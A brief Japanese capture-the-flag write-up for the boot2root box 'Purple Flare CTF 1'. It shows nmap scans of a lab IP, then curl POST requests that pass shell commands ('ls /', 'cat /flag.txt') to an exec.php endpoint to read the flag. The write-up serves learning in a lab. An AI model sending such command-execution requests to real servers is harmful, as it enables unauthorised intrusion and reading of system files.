Purple Flare CTF 1

[Purple Flair CTF][HiddenService]
Boot2Root CTF

Writeup

ターゲットのIPアドレスは、変わるのかも。

1. ポートスキャンでサービスを確認

   nmap -sS -p- 10.234.128.6
   nmap -sV 10.234.128.6
   

2. httpサーバへアクセス

   curl 10.234.128.6:31337
   

3. phpファイルにPOSTでコマンドを送信

   curl -X POST -d "cmd=ls /" 10.234.128.6:31337/exec.php
   curl -X POST -d "cmd=cat /flag.txt" http://10.234.128.6:31337/exec.php
   

公式のWriteupを読んだら、ブラウザでアクセスしていた。そりゃそうか。
以上です。

参考サイト